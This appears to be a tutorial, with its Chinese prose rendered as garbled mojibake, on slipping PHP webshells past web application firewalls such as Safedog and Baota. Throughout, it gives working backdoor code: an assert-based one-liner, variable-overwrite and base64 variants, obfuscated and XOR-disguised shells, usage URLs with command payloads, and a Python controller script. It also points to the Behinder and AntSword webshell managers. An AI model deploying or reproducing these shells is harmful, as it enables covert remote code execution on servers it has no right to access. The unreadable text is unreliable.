WAFÈÆ¹ý-ȨÏÞ¿ØÖÆÖ®´úÂë»ìÏý¼°ÐÐΪÔìÂÖ×Ó

Safedog-ÊÖд¸²¸Ç±äÁ¿¼òÒ×´úÂëÈÆ¹ý-´úÂë²ã
Õý³£Çé¿öÏÂ: 
Ò»¾ä»°Ä¾Âí:<?php assert($_POST['chopper']);?> ±äÁ¿¸²¸Ç:ͨ¹ý°ÑÃô¸Ð×Ö·ûдµ½²ÎÊýÉÏ,ÈÆ¹ýWAF:
<?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b($_POST['z']);
?>
//´«²Î:?x=b&y=assert
//$a=b $$a=$b=assert
//$b($_POST['z'])±ä³Éassert($_POST['z']);
¿ÉÒÔÈÆ¹ýsafedog²éɱ
ÉÏ´«³É¹¦ºó, ·ÃÎÊ:http://127.0.0.1:8081/x/1.php?x=b&y=assert ²¢ÇÒ(¿ÉÒÔÓÃhackbar²å¼þ)postdata:z=phpinfo(); safedog²»À¹½Ø 
²ÉÈ¡ÉÏÊö¸²¸Ç±äÁ¿µÄ·½Ê½¿ÉÒÔÈÆ¹ý°²È«¹·²éɱ,µ«Êǻᱻ±¦ËþÀ¹½Ø¡£ÔÒòÊÇ ±¦Ëþ¹ýÂ˹æÔòÀﶨÒåÁËphpinfo()µÈ¹Ø¼ü×Ö¡£ 
ËùÒÔ¿ÉÒÔÅäÌ×ʹÓñàÂë½âÂë·½Ê½ÈÆ¹ý±¦Ëþ¡£
<?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b(base64_decode($_POST['z']));
?>
ÉÏ´«³É¹¦ºó,
·ÃÎÊ:http://127.0.0.1:8081/x/1.php?x=b&y=assert
²¢ÇÒ(¿ÉÒÔÓÃhackbar²å¼þ)postdata:z=cGhwaW5mbygpOw==
²âÊÔ,³É¹¦¡£ 
Safedog-»ùÓÚ½Ó¿ÚÀà¼ÓÃÜ»ìÏý´úÂëÈÆ¹ý-´úÂë²ã
ÉÏ´«Ò»¾ä»°Ä¾Âí:
<?php assert(base64_decode($_POST['chopper']));?>
ľÂíÎļþ±»°²È«¹·²éɱ 
¼ÓÃÜ»ìÏýµÄ·½·¨Èƹý
ʹÓÃenPHP¹¤¾ß¼ÓÃÜ»ìÏý´úÂë
enPHP¹¤¾ß ÃüÁî:php.exe code_test.php 
¼ÓÃÜ»ìÏýºóľÂí:
<?php /* -- enphp : https://github.com/djunny/enphp */ error_reporting(E_ALL^E_NOTICE);define('Œ™', '€');$_SERVER[Œ™] = explode('|||', gzinflate(substr('? K,.N-*©aB–¤ÄâT3“ø”Ôäü”TˆP .5&6 ',0x0a, -8))); $_SERVER{Œ™}[0]($_SERVER{Œ™}{0x001}($_POST[$_SERVER{Œ™}[0x0002]]));?>
 ÏÖÔڳɹ¦²»ÁËÁË
phpjiamiÔÚÏß¼ÓÃÜ»ìÏý
µØÖ·:https://www.phpjiami.com/phpjiami.html  ÏÖÔڳɹ¦²»ÁËÁË
safedog,BT,Aliyun-»ùÓÚ¸²¸Ç¼ÓÃܱäÒì(Òì»òÉú³É)ϱàÂë½âÂëÈÆ¹ý-´úÂë²ã
venom:Ö§³ÖÉú³Éasp¡¢aspx¡¢jsp¡¢phpµÈÒ»¾ä»°ÃâɱľÂí
python3 php_venom_3.3.py //Éú³ÉÃâɱһ¾ä»° python3 php_venom_3.3.py shell.php //¶ÔͬĿ¼ÏÂshell.php½øÐÐÃâɱ´¦Àí,½á¹û±£´æÔÚshell.php.bypass.php ʹÓÃ˵Ã÷:
ÊÇ·ñ´«Èëid²ÎÊý¾ö¶¨ÊÇ·ñ°ÑÁ÷Á¿±àÂë
http://www.xxx.com/shell.php
POST: mr6=phpinfo(); //ÓëÆÕͨshellÏàͬ
http://www.xxx.com/shell.php?id=xxx(xxxxËæ±ãÐÞ¸Ä)
POST: mr6=cGhwaW5mbygpOwo= //payloadµÄbase64±àÂë
µÚÒ»ÖÖ:Éú³ÉÃâɱһ¾ä»°Ä¾Âí 
<?php
class HBPM{
function __destruct(){
$YRLJ='QD<!f-'^"\x30\x37\x4f\x44\x14\x59";
return @$YRLJ("$this->ABMQ");
}
}
$hbpm=new HBPM();
@$hbpm->ABMQ=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6'];
?>
Èç¹û²»´«²ÎidµÄ»°,¾Í²»base½âÃÜmr6,Èç¹û´«²ÎidµÄ»°,¾Íbase½âÃÜmr6 

µÚ¶þÖÖ:¸ù¾Ý×Ô¼ºÐ´µÄ´úÂëÉú³ÉÃâɱһ¾ä»°Ä¾Âí 
Safedog,BT,Aliyun-»ùÓÚ±ùЫÐÂÐÍ¿ØÖÆÆ÷ÈÆ¹ýÈ«Ãæ²âÊÔ-ÐÐΪ²ã
3¸ö¹¤¾ß±È½Ï:
²Ëµ¶:ÒѾ²»ÔÙ¸üÐÂÁË,ÎÞ²å¼þ(¿´¾ÙÀý1),µ¥Ïò¼ÓÃÜ´«Êä,´ò5·Ö,²»½¨ÒéʹÓᣠÒϽ£:³ÖÐø¸üÐÂ״̬,Óвå¼þ,À©Õ¹ÐÔÇ¿,ȱµãÊǵ¥Ïò¼ÓÃÜ´«Êä,´ò8·Ö¡£ ±ùЫ:³ÖÐø¸üÐÂ״̬,δ֪²å¼þ,À©Õ¹ÐÔÇ¿,Ë«Ïò¼ÓÃÜ´«Êä,Æ«ÏòÓÚºóÉøÍ¸,¿ÉÒÔÁª¶¯msf.,´ò·Ö9·Ö,ÍÆ¼öʹÓᣠÏÂÔØµØÖ·:
±ùЫ:https://github.com/rebeyond/Behinder/releases/ ÒϽ£:https://github.com/AntSwordProject/antSword/releases  
µ¥Ïò¼ÓÃÜ´«ÊäVSË«Ïò¼ÓÃÜ´«Êä
µ¥Ïò¼ÓÃÜ´«Êä:ÇëÇó²ÎÊý¼ÓÃÜ,ÏìÓ¦²»¼ÓÃÜ¡£ Ë«Ïò¼ÓÃÜ´«Êä:ÇëÇó¼ÓÃÜ,ÏìÓ¦¼ÓÃÜ,¸üºÃµØ±£»¤Êý¾Ý´«Êä,·ÀÖ¹wafÀ¹½Ø±»É±¡£
²Ëµ¶µ¥Ïò¼ÓÃÜ´«Êä
ץȡÊý¾Ý°ü  Ä£Äâ·¢°ü  ½âÃÜ 
±ùЫ˫Ïò¼ÓÃÜ´«Êä

±ùЫ-Ë«Ïò¼ÓÃÜ´«Êä-×¥°ü²é¿´  ÉèÖôúÀí 
Safedog,BT,Aliyun-»ùÓÚÊÖдÐÂÐÍ¿ØÖÆÆ÷ÈÆ¹ýÈ«Ãæ²âÊÔ-ÐÐΪ²ã
ʹÓù¤¾ßÁ¬½ÓľÂíʱ,waf¿ÉÄÜ»áͨ¹ý¹¤¾ßµÄÖ¸ÎÆÊµÏÖÀ¹½Ø,´ËʱÎÒÃÇ¿ÉÒÔ²ÉÓÃÈçÏ·½·¨Èƹý:1¡¢Ö¸ÎƱäÒì 2¡¢×Ô¼ºÔìÂÖ×Ó ¾ÙÀýÈçÏÂ,×Ô¼ºÐ´½Å±¾Ä£Ä⹤¾ß ÉÏÃæÄÇÖÖÐÐΪ»á±»À¹½Ø,ËùÒÔÎÒÃÇ¿ÉÒÔ×Ô¼ºÐ´¿ØÖÆÆ÷
http://test.xxx.com/xx.php?x=b&y=assert
post data¾ÙÀý:
Ö´ÐдúÂë z=phpinfo(); --> z=cGhwaW5mbygpOw==
дÈëÎļþ z=file_put_contents("test.txt","1"); --> z=ZmlsZV9wdXRfY29udGVudHMoInRlc3QudHh0IiwiMSIpOw==
¶ÁÈ¡Îļþ z=var_dump(scandir(".")); --> z=dmFyX2R1bXAoc2NhbmRpcigiLiIpKTs=


python´úÂë
import requests
import base64
url = input("ÇëÊäÈëÄãµÄºóÃŵØÖ·")
path = {
'z':'dmFyX2R1bXAoc2NhbmRpcigiLiIpKTs='
}
result = requests.post(url, data=path).text
print(result)

|